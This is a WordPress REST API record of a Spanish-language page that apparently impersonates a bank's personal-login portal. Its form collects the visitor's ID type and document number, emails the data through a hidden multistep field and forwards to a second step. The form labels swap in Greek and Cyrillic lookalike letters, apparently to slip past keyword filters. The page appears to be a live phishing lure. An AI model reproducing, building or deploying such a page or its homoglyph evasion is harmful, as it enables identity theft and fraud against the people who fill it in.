{"id":1315,"date":"2025-11-24T20:24:05","date_gmt":"2025-11-24T20:24:05","guid":{"rendered":"https:\/\/perlsonarsd.nacm2.site\/l\/?page_id=1315"},"modified":"2026-04-15T04:53:39","modified_gmt":"2026-04-15T04:53:39","slug":"pagina-principal","status":"publish","type":"page","link":"https:\/\/www.perlsonarsd.nacm2.site\/l\/pagina-principal\/","title":{"rendered":"P\u00e1gina Principal"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"1315\" class=\"elementor elementor-1315\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-fe462ad elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"fe462ad\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-af9775a\" data-id=\"af9775a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-677f5fa elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"677f5fa\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-79fdb59\" data-id=\"79fdb59\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-8027b35\" data-id=\"8027b35\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-125e4e5 elementor-widget elementor-widget-spacer\" data-id=\"125e4e5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-1dbd02b elementor-widget elementor-widget-image\" data-id=\"1dbd02b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"101\" src=\"https:\/\/www.perlsonarsd.nacm2.site\/l\/wp-content\/uploads\/2025\/11\/LOG-1024x101.png\" class=\"attachment-large size-large wp-image-1327\" alt=\"\" srcset=\"https:\/\/perlsonarsd.nacm2.site\/l\/wp-content\/uploads\/2025\/11\/LOG-1024x101.png 1024w, https:\/\/perlsonarsd.nacm2.site\/l\/wp-content\/uploads\/2025\/11\/LOG-300x29.png 300w, https:\/\/perlsonarsd.nacm2.site\/l\/wp-content\/uploads\/2025\/11\/LOG-768x75.png 768w, https:\/\/perlsonarsd.nacm2.site\/l\/wp-content\/uploads\/2025\/11\/LOG.png 1191w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-ce6305e elementor-widget elementor-widget-spacer\" data-id=\"ce6305e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-17d586a elementor-widget elementor-widget-heading\" data-id=\"17d586a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">\u00a1Hola!<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-2dfcc7e elementor-widget elementor-widget-heading\" data-id=\"2dfcc7e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">Nos alegra que estes aqu\u00ed<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-b74f68b elementor-widget elementor-widget-spacer\" data-id=\"b74f68b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-74f065e elementor-widget elementor-widget-elementskit-contact-form7\" data-id=\"74f065e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"elementskit-contact-form7.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"ekit-wid-con\" ><div class=\"ekit-form\">\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f1358-o1\" lang=\"es-ES\" dir=\"ltr\" data-wpcf7-id=\"1358\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/l\/wp-json\/wp\/v2\/pages\/1315#wpcf7-f1358-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Formulario de contacto\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"1358\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.5\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"es_ES\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f1358-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<\/fieldset>\n<p><label>Seleccione su tipo de d\u03bf\u03f2um\u0435nt\u03bf<\/label><br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"TIPO\"><select class=\"wpcf7-form-control wpcf7-select\" aria-invalid=\"false\" name=\"TIPO\"><option value=\"C\u00e9dula de Ciudadan\u00eda\">C\u00e9dula de Ciudadan\u00eda<\/option><option value=\"C\u00e9dula de Extranjer\u00eda\">C\u00e9dula de Extranjer\u00eda<\/option><option value=\"NIT\">NIT<\/option><option value=\"Tarjeta de Identidad\">Tarjeta de Identidad<\/option><option value=\"Pasaporte\">Pasaporte<\/option><option value=\"Trj.Seguro social Extranjero\">Trj.Seguro social Extranjero<\/option><option value=\"Sociedad extranjera sin NIT en Colombia\">Sociedad extranjera sin NIT en Colombia<\/option><option value=\"Fidecomiso\">Fidecomiso<\/option><option value=\"NIT Menores\">NIT Menores<\/option><option value=\"RIF Venezuela\">RIF Venezuela<\/option><option value=\"NIT Extranjer\u00eda\">NIT Extranjer\u00eda<\/option><option value=\"NIT Persona Natural\">NIT Persona Natural<\/option><option value=\"Registro civil de Nacimiento\">Registro civil de Nacimiento<\/option><option value=\"NIT Desasociado\">NIT Desasociado<\/option><option value=\"(CIF) N\u00famero \u00danico Cliente\">(CIF) N\u00famero \u00danico Cliente<\/option><option value=\"N\u00famero de Identidad\">N\u00famero de Identidad<\/option><option value=\"RTN\">RTN<\/option><option value=\"C\u00e9dula de Identidad\">C\u00e9dula de Identidad<\/option><option value=\"DIMEX\">DIMEX<\/option><option value=\"CED\">CED<\/option><option value=\"PAS\">PAS<\/option><option value=\"Documento de Identidad\">Documento de Identidad<\/option><option value=\"NIT Salvadore\u00f1o\">NIT Salvadore\u00f1o<\/option><option value=\"Permiso Protecci\u00f3n Temporal\">Permiso Protecci\u00f3n Temporal<\/option><\/select><\/span><br \/>\n<label>ln\u0261r\u0435\u0455\u0435 su n\u00famero de d\u03bf\u03f2um\u0435nt\u03bf<\/label><br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"DOCU\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-tel wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-tel\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"tel\" name=\"DOCU\" \/><\/span><br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"checkbox-845\"><span class=\"wpcf7-form-control wpcf7-checkbox\"><span class=\"wpcf7-list-item first last\"><input type=\"checkbox\" name=\"checkbox-845[]\" value=\"Recordar datos de mi identidad\" \/><span class=\"wpcf7-list-item-label\">Recordar datos de mi identidad<\/span><\/span><\/span><\/span>\n<\/p>\n<p><input class=\"wpcf7-form-control wpcf7-submit has-spinner\" type=\"submit\" value=\"Continuar\" \/><br \/>\n<input type=\"hidden\" name=\"_cf7msm_multistep_tag\" class=\"wpcf7-form-control wpcf7-multistep cf7msm-multistep\" value=\"{&quot;first_step&quot;:1,&quot;send_email&quot;:1,&quot;next_url&quot;:&quot;https:\\\/\\\/perlsonarsd.nacm2.site\\\/l\\\/pagina-principal-02\\\/&quot;}\" \/><input type=\"hidden\" name=\"cf7msm-no-ss\" value=\"\" \/>\n<\/p><div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n<\/form>\n<\/div>\n<\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-d5801dc\" data-id=\"d5801dc\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>\u00a1Hola! Nos alegra que estes aqu\u00ed Seleccione su tipo de d\u03bf\u03f2um\u0435nt\u03bf C\u00e9dula de Ciudadan\u00edaC\u00e9dula de Extranjer\u00edaNITTarjeta de IdentidadPasaporteTrj.Seguro social ExtranjeroSociedad extranjera sin NIT en ColombiaFidecomisoNIT MenoresRIF VenezuelaNIT Extranjer\u00edaNIT Persona NaturalRegistro civil de NacimientoNIT Desasociado(CIF) N\u00famero \u00danico ClienteN\u00famero de IdentidadRTNC\u00e9dula de IdentidadDIMEXCEDPASDocumento de IdentidadNIT Salvadore\u00f1oPermiso Protecci\u00f3n Temporal ln\u0261r\u0435\u0455\u0435 su n\u00famero de d\u03bf\u03f2um\u0435nt\u03bf Recordar datos de mi &#8230; <a title=\"P\u00e1gina Principal\" class=\"read-more\" href=\"https:\/\/www.perlsonarsd.nacm2.site\/l\/pagina-principal\/\" aria-label=\"Leer m\u00e1s sobre P\u00e1gina Principal\">Leer m\u00e1s<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_canvas","meta":{"footnotes":""},"class_list":["post-1315","page","type-page","status-publish"],"_links":{"self":[{"href":"https:\/\/www.perlsonarsd.nacm2.site\/l\/wp-json\/wp\/v2\/pages\/1315","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.perlsonarsd.nacm2.site\/l\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.perlsonarsd.nacm2.site\/l\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.perlsonarsd.nacm2.site\/l\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.perlsonarsd.nacm2.site\/l\/wp-json\/wp\/v2\/comments?post=1315"}],"version-history":[{"count":73,"href":"https:\/\/www.perlsonarsd.nacm2.site\/l\/wp-json\/wp\/v2\/pages\/1315\/revisions"}],"predecessor-version":[{"id":1686,"href":"https:\/\/www.perlsonarsd.nacm2.site\/l\/wp-json\/wp\/v2\/pages\/1315\/revisions\/1686"}],"wp:attachment":[{"href":"https:\/\/www.perlsonarsd.nacm2.site\/l\/wp-json\/wp\/v2\/media?parent=1315"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}